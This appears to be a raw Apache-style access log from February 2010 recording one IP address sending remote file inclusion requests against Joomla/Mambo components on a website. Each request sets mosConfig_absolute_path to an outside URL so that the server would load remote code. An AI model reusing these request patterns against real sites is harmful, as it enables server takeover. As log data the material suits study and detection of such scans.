200.85.1.152 - - [15/Feb/2010:08:02:51 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:51 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:57 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:57 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:57 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:03:31 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
